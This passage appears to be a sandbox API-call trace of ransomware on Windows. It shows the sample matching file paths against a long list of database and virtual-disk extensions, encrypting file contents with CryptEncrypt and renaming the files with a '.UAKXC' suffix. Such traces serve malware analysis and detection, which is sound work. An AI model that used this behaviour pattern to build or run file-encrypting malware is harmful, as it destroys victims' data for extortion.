(lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".lgc") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".lwx") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".maf") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".maq") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mar") returned 0x0 [0157.654] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mas") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mav") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mdb") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mdf") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mpd") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mrg") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mud") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mwb") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".myd") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ndf") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nnt") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nrmlib") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ns2") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ns3") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".ns4") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nsf") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nv") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nv2") returned 0x0 [0157.655] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nwdb") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nyf") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".odb") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".oqy") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".orx") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".owc") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".p96") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".p97") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".pan") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".pdb") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".pdm") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".pnz") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".qry") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".qvd") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".rbf") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".rctd") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".rod") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".rodx") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".rpd") returned 0x0 [0157.656] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".rsd") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sbf") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".scx") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sdb") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sdc") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sdf") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sis") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".spq") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sql") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sqlite") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sqlite3") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".te") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".temx") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".tmd") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".tps") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".trc") returned 0x0 [0157.657] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".trm") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".udb") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".udl") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".usr") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".v12") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vis") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vpd") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vvv") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".wdb") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".wmdb") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".wrk") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".xdb") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".xld") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".xmlff") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".abcddb") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".abs") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".abx") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".accdw") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".adn") returned 0x0 [0157.658] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".db2") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".fm5") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".hjt") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".icg") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".icr") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".kdb") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".lut") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".maw") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mdn") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".mdt") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vdi") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vhd") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmdk") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".pvm") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmem") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmsn") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmsd") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".nvram") returned 0x0 [0157.659] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmx") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".raw") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".qcow2") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".subvol") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".bin") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vsv") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".avhd") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmrs") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vhdx") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".avdx") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".vmcx") returned 0x0 [0157.660] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".iso") returned 0x0 [0157.660] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.660] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0157.967] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0157.967] SetEndOfFile (hFile=0x6ec) returned 1 [0157.967] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.967] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x708, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x708, lpOverlapped=0x0) returned 1 [0157.967] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.967] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x708, lpOverlapped=0x0) returned 1 [0157.968] CloseHandle (hObject=0x6ec) returned 1 [0157.969] GetProcessHeap () returned 0xea0000 [0157.969] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0157.969] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" [0157.969] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.UAKXC" [0157.969] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.uakxc")) returned 1 [0157.970] GetProcessHeap () returned 0xea0000 [0157.970] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0157.970] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5cb0 | out: hHeap=0xea0000) returned 1 [0157.970] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef3258 | out: hHeap=0xea0000) returned 1 [0157.970] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0157.970] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0157.970] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0157.971] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml")) returned 0x2020 [0157.971] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0157.971] GetLastError () returned 0x0 [0157.972] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=811) returned 1 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".4dd") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".4dl") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accdb") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accdc") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accde") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accdr") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accdt") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".accft") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".adb") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ade") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".adf") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".adp") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".arc") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ora") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".alf") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ask") returned 0x0 [0157.972] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".btr") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".bdf") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".cat") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".cdb") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".ckp") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".cma") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".cpd") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dacpac") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dad") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".dadiagrams") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".daschema") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".db") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".db-shm") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", lpSrch=".db-wal") returned 0x0 [0157.973] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml", 